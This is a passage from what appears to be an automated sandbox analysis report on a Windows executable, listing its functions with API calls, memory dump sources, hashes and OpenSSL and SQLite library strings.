                                                                                                                                                                                                                                              • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2718003287-0
                                                                                                                                                                                                                                              • Opcode ID: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
                                                                                                                                                                                                                                              • Instruction ID: 44dc6140cc07823e08c36d7133b7fb63651f8aa41e4be9516083f75f5c8f87c4
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AAD1E073B0CA918AE711CF6AC4402AC37A1FB55799B444226DF4E97FE9EE39E046C300
                                                                                                                                                                                                                                              Function 00007FF6B751CF60 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6B751CF4B), ref: 00007FF6B751D07C
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6B751CF4B), ref: 00007FF6B751D107
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 953036326-0
                                                                                                                                                                                                                                              • Opcode ID: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
                                                                                                                                                                                                                                              • Instruction ID: 6d89d0196e781cbe9b536f63fc846c5fa44fd028449234b695db76210944b5d4
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1191ADB3E1C76285F7609F6D94406BD2BA0AB44B89F544139DF0EA7EA4DF39E482D700
                                                                                                                                                                                                                                              Function 00007FF6B751F98C Relevance: 6.2, APIs: 4, Instructions: 162COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _get_daylight$_isindst
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 4170891091-0
                                                                                                                                                                                                                                              • Opcode ID: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
                                                                                                                                                                                                                                              • Instruction ID: 2480a9834041957690d72a35a3b3ad33d18c6458603f197fed6fc41226b2a31f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6451A573F092218AEB14DF689D556BC3765AB4436AF500235DF1E96EF5DF3CAC428600
                                                                                                                                                                                                                                              Function 00007FF6B751577C Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2780335769-0
                                                                                                                                                                                                                                              • Opcode ID: 601044899bb77d1db34704472f686b9691880a3163deed0eb7e9945e8072c835
                                                                                                                                                                                                                                              • Instruction ID: 803bd9ca3fe3c0d96ccc62fc5c04e7848bbf9edbc97e47014380b2b047fb8bdb
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 601044899bb77d1db34704472f686b9691880a3163deed0eb7e9945e8072c835
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8C516A23E086518AFB10DFB994503BD27A1AB48B99F248535EF4D9BAA9DF38E4418701
                                                                                                                                                                                                                                              Function 00007FFE013640F0 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2120062918.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFE01300000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120031328.00007FFE01300000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01461000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01463000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01478000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120284056.00007FFE0147A000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120315849.00007FFE0147C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffe01300000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: 00007A463010
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 4225454184-0
                                                                                                                                                                                                                                              • Opcode ID: 64d0e023b8156f1abb0180eff28680d25e95d8f25c8afd14df0e7a8be79250ce
                                                                                                                                                                                                                                              • Instruction ID: 0dec83d39894424bb613d8cbbe4bd8dd6449324418371643381e357d98a2bbc8
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 64d0e023b8156f1abb0180eff28680d25e95d8f25c8afd14df0e7a8be79250ce
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 372148A2B19B5283DB64AF16B5511BAA3A1FF44BC0F095135DB8E4BFA6DF2CE0518700
                                                                                                                                                                                                                                              Function 00007FF6B75020C0 Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1956198572-0
                                                                                                                                                                                                                                              • Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                                              • Instruction ID: 6214889d40ec9376fab55ed24eb7b1ce0963c1cda315b5dcd7b41a35f671fae4
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EB110C23F0C14642F655876DE98427953A2FF88784F448030DB4947BA9DD3DE6C58240
                                                                                                                                                                                                                                              Function 00007FF6B750D010 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2933794660-0
                                                                                                                                                                                                                                              • Opcode ID: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
                                                                                                                                                                                                                                              • Instruction ID: cf0a4ed76acf0aa4311c429a08e1263f8d6a44b67f07f7297b7b6e0ae947c764
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 83111822B18B058AEB008B64E8542B933B4FB59758F440E35DB6D867B4EF7CD1A48340
                                                                                                                                                                                                                                              Function 00007FFDFAE62E0C Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116621230.00007FFDFAE61000.00000040.00000001.01000000.00000013.sdmp, Offset: 00007FFDFAE60000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116507686.00007FFDFAE60000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116621230.00007FFDFAEAA000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116621230.00007FFDFAEB8000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116621230.00007FFDFAF07000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116621230.00007FFDFAF0C000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116621230.00007FFDFAF0F000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117242370.00007FFDFAF10000.00000080.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117294434.00007FFDFAF12000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfae60000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2933794660-0
                                                                                                                                                                                                                                              • Opcode ID: 1143ce772416530538e6e632f3059b38426edc2ca8d0a1c1cafe6258f8b28d68
                                                                                                                                                                                                                                              • Instruction ID: 2f23a18ad54500a2fa63d70eef5f40e8dd026198a15443028218e2d25cfdccfe
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1143ce772416530538e6e632f3059b38426edc2ca8d0a1c1cafe6258f8b28d68
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 91115236B24F058AEB54DF60E8647B833A4FB19758F440E31EA6E467A8DF7CD1548740
                                                                                                                                                                                                                                              Function 00007FFE007DECE0 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2119745990.00007FFE00761000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFE00760000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119715206.00007FFE00760000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE007E3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE007E5000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE0080D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE00818000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE00823000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119967268.00007FFE00827000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119999506.00007FFE00829000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffe00760000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2933794660-0
                                                                                                                                                                                                                                              • Opcode ID: c228ff487a8229492adc3f8944b6875e240ddca761839ed72b11deef452fc955
                                                                                                                                                                                                                                              • Instruction ID: ce008a00f89694371858310820a76f03f529d31141f4a6223f560602a8f0f5c9
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c228ff487a8229492adc3f8944b6875e240ddca761839ed72b11deef452fc955
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B7112A26B14F45CAEB00DF60E8556F833A8FB59B58F440E31DB6D867A8EF78D1988350
                                                                                                                                                                                                                                              Function 00007FFE00761A05 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 283COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2119745990.00007FFE00761000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFE00760000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119715206.00007FFE00760000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE007E3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE007E5000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE0080D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE00818000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE00823000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119967268.00007FFE00827000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119999506.00007FFE00829000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffe00760000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: 00007
                                                                                                                                                                                                                                              • String ID: ..\s\ssl\ssl_asn1.c$d2i_SSL_SESSION
                                                                                                                                                                                                                                              • API String ID: 3568877910-384499812
                                                                                                                                                                                                                                              • Opcode ID: 2a5271567f02ba352d921ff3c4e2fac1e9ecca7785b90009fd4beffc7ef3d7b0
                                                                                                                                                                                                                                              • Instruction ID: 99bb4ea34eb40162b794645ee139b1ccd1ab0b51f09ba9946776e023c1015e02
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2a5271567f02ba352d921ff3c4e2fac1e9ecca7785b90009fd4beffc7ef3d7b0
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DED12A22A0AB86D2EB66AF25D4902B927A4FB44B84F4C8036DF4D477A9DF3CE551C350
                                                                                                                                                                                                                                              Function 00007FFE00762126 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 268COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2119745990.00007FFE00761000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFE00760000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119715206.00007FFE00760000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE007E3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE007E5000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE0080D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE00818000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE00823000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119967268.00007FFE00827000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119999506.00007FFE00829000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffe00760000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: 00007
                                                                                                                                                                                                                                              • String ID: ..\s\ssl\ssl_sess.c$ssl_get_prev_session
                                                                                                                                                                                                                                              • API String ID: 3568877910-1331951588
                                                                                                                                                                                                                                              • Opcode ID: e391f8e95c0f4977e9b0a03ed3c244edb74b16920bfda910dd9f54047f92028c
                                                                                                                                                                                                                                              • Instruction ID: 0054f820ef3f1a97a887ae48aa783f99be6919d11d7becb9d57f4c01f510539e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e391f8e95c0f4977e9b0a03ed3c244edb74b16920bfda910dd9f54047f92028c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5EC17C26B1A68282FB64EB21D5547B963A4FB84B88F484132DF4E477BADF3DE451C700
                                                                                                                                                                                                                                              Function 00007FFE013705E0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 228COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2120062918.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFE01300000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120031328.00007FFE01300000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01461000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01463000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01478000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120284056.00007FFE0147A000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120315849.00007FFE0147C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffe01300000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: 00007A463010
                                                                                                                                                                                                                                              • String ID: string or blob too big
                                                                                                                                                                                                                                              • API String ID: 4225454184-2803948771
                                                                                                                                                                                                                                              • Opcode ID: b81232058dfc0d3f4fd89c77043a3447b7e04635d1bf8bf30793d04e799f5449
                                                                                                                                                                                                                                              • Instruction ID: 54051858877c67e645dbbe0ca414eebb074d9fdd68227e3f408fa93ac17c50e5
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b81232058dfc0d3f4fd89c77043a3447b7e04635d1bf8bf30793d04e799f5449
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4A919821A0838285FB7C9B1590653B967A0EF82B98F164139EE4E0B3F6DE3DE845C740
                                                                                                                                                                                                                                              Function 00007FFE0139D690 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 163COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • 00007FFE1A463010.VCRUNTIME140(?,?,?,?,?,?,00000000,00000001,00007FFE0139D93A,?,?,?,00007FFE0139DCFB), ref: 00007FFE0139D8A7
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2120062918.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFE01300000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120031328.00007FFE01300000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01461000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01463000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01478000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120284056.00007FFE0147A000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120315849.00007FFE0147C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffe01300000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: 00007A463010
                                                                                                                                                                                                                                              • String ID: CRE$INS
                                                                                                                                                                                                                                              • API String ID: 4225454184-4116259516
                                                                                                                                                                                                                                              • Opcode ID: 177b3dc2dd9e3d69267a52aa739a80a639a766b193c8cfec1c294ebe9436121b
                                                                                                                                                                                                                                              • Instruction ID: f20aa3e1795186683ec51aafce4aae867cbdb8723e854d24462e116cc76e8979
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 177b3dc2dd9e3d69267a52aa739a80a639a766b193c8cfec1c294ebe9436121b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9851AC25B0D68281FB619FA6A45227D67A1BF80FC4F5A4135DE4D4F7B9DE3CE8018340
                                                                                                                                                                                                                                              Function 00007FFE00761EBF Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 140COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2119745990.00007FFE00761000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFE00760000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119715206.00007FFE00760000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE007E3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE007E5000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE0080D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE00818000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE00823000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119967268.00007FFE00827000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119999506.00007FFE00829000.00000004.00000001.01000000.00000010.sdmpDownload File
